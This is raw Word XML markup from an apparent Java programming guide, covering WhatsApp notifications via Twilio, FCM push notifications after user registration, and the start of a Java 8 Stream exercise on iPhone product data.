        <w:t>Firebase Cloud Messaging (FCM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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99" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50265003"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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8591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WhatsApp Notification (Using Twilio API):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF4EBA"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a WhatsApp notification, you will need to integrat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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DC2151"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WhatsApp Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F701E9"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Twilio Account</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set up the WhatsApp API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5911072F"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the Account SI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uth Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Twilio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D711C"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WhatsApp Messages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after user registration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF94A9E"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wilio API Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB04439" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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rst, you need to add Twilio’s Java SDK to your project. You can add it via </w:t>
      </w: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494DF53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4EC4378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twilio</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589266D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twilio</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038046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8.16.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14385193" w14:textId="241EE32B"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3E698854"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WhatsApp Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3645F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p>
    <w:p w14:paraId="732664E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20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p>
    <w:p w14:paraId="22FAB6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p>
    <w:p w14:paraId="072FCE7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0F4F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hatsApp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76CAF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543F3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r Twilio credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290AF0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CCOUNT_S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ccount_sid"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B0F44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TH_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uth_token"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569897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FB89F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E89EF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_S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TH_TOKEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792792E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3C20E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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> messag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or</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C72E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hatsApp recipient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5117E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141552388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wilio WhatsApp number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F0CD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ssage to send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BEA1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1BFF923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988A5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ssage S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Sid</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF0C7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DC5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4EB7A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CF550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WhatsApp message after registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE079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9198765432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our platform! Your registration is successful."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30763D7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252E49" w14:textId="5E1058BC"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491FA4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4F3C5A00"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ilio.init</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initializes Twilio with your ACCOUNT_SID and AUTH_TOKEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59559FC5"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ssage.creator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates and sends the message to the recipient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF2660"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obile Notification (Using Firebase Cloud Messaging - FCM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD01A99"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push notifications to a mobile device, we use </w:t>
      </w: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FCM Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEEC260"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Up Firebase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A3D429"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 Firebase SDK into your mobile app (both Android and iOS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421AE4DD"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Notification After User Registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCABB31"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irebase’s HTTP API to send the notification from your backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287C168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FCM Notification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78F6B6"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TTP POST requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send notifications via FCM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D6A6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Java Code (Backend - Using FCM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887800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p>
    <w:p w14:paraId="11485AC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p>
    <w:p w14:paraId="1FD0296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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD1912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BAC0E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ush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8985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4A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ebase Server Key (from Firebase Console)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50FF8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ERVER_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firebase_server_key"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1067A68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CM_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fcm.googleapis.com/fcm/send"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B48D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D6B0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401E0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C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URL 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CM_URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8B11F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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> connec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penConnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3CC6A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9F09E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request method and headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4AE29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OST"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE2A8B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thoriz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RVER_KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7570799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ent-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lication/json"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F52CE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C9A4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oOu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0BB1D2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5935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payload to send notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DF1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ylo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FE471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A722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otification\":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FA4DD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itle\": \"Registration Successful\",\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8D46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d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915B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D3AEA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ority\": \"high\"\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F2E7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7205FB6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8B2B8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nd the notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812F82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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> o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utpu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7870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y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ylo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Byt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tf-8"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394DA4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o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085FC5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2E010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2E938B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response code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3831848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ponse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ponseCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6ADF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ponse Cod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Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C1AD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F9D7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2A826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E1D71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05E91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CD1AA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49B6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push notification after registration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204AF91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vice_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CM device token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7741C6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the app! Your registration is successful."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B3D6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EFB31" w14:textId="753D51AA"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EA7671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372BE60E"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URLConnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to make an HTTP POST request to Firebase Cloud Messaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A25801A"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horization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pass the FCM Server Key in the header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB03730"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reate a JSON payload with the device token and message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32423329"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vice Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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900" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="230E69D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e Flow After User Registration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B005039"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Registration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56128E18"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r registers by providing their details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2246F"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ckend system validates the registration and saves the user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C7784"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73A1B77A"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Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D67C9B6"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901" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="494C47A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he Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E664989"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provides registration details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051FBB27"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validates and stores user details</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B8B5B"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WhatsApp message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Twilio API to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFDE0C6"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mobile push notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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902" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240660A"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5B976DB1"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CM Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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6F71C9CA" w14:textId="77777777" w:rsidR="00521BBA" w:rsidRPr="00CE4B95" w:rsidRDefault="00521BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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CE4B95" w:rsidRDefault="00521BBA" w:rsidP="00521BBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F026240" w14:textId="4AC01ED8" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="_Toc197867610"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="006B12C9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Java 8 Stream Program</w:t>
      </w:r>
      <w:bookmarkEnd w:id="396"/>
      <w:r w:rsidR="006B12C9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7EF5C" w14:textId="77777777" w:rsidR="00EB4F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="00EB4F1F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00EB4F1F" w:rsidRPr="00CE4B95">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1. Print Product which is iPhone 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB720AB" w14:textId="15D3213D"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2. get the product and its feature which has highest resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980222B" w14:textId="5FAEED70" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4F1F" w:rsidP="00EB4F1F">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3. Print number of iPhone15 and iPhone16 count in each location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB9B45" w14:textId="2BBEB35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E4898C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218F4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57DC6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E7BE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03D3769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279C23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1BC03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AB00A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264624A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BF8B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882F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47B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E2CF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58B04C8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74015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63AEC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235229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7C14C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ature{pic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solu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236ED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3A4A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E101BC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070A0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18426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65B822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63FFA5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618DD8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19A952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0FBE151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CE98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8B54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5DAED2E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16DD187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3B01854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4463813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385FDA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8158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E67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6F74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4099072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B545E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469E3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20F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01C9796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43DCB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77CA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92167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5874180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FE7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90017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59589A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CE877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mode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col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lo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222F91C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79B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72065D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F60D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3D8E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83D40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6900E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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54965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5E17EA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5687919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9E8F51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91060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57E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5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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C993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6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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE76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B602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5Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BE05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6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h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aliforni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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB69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11B01D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duc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phone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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242241B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3ED9B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Print Product which is iPhone 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73327CE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1. Product iPhone 16:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EF3BD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ED81D6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p>
    <w:p w14:paraId="23EC87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1C007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4A619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Get the product and its feature with the highest resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EDC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2. Product and Feature with the highest resolution:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE99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702D0C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bstrac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mpleEntry</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210D30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A7B81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p>
    <w:p w14:paraId="5F28B86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duc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837C88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501E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rint the number of iPhone 15 and iPhone 16 count in each location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F664A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3. Count of iPhone15 and iPhone16 in each location:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E80A99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8F806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E2E03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665452D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FB08F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789436D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p>
    <w:p w14:paraId="6909802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C86E1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F99C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0E01E" w14:textId="428030B5"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FCC1727" w14:textId="77777777" w:rsidR="00A96B6F" w:rsidRPr="00CE4B95" w:rsidRDefault="00A96B6F" w:rsidP="00597807">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
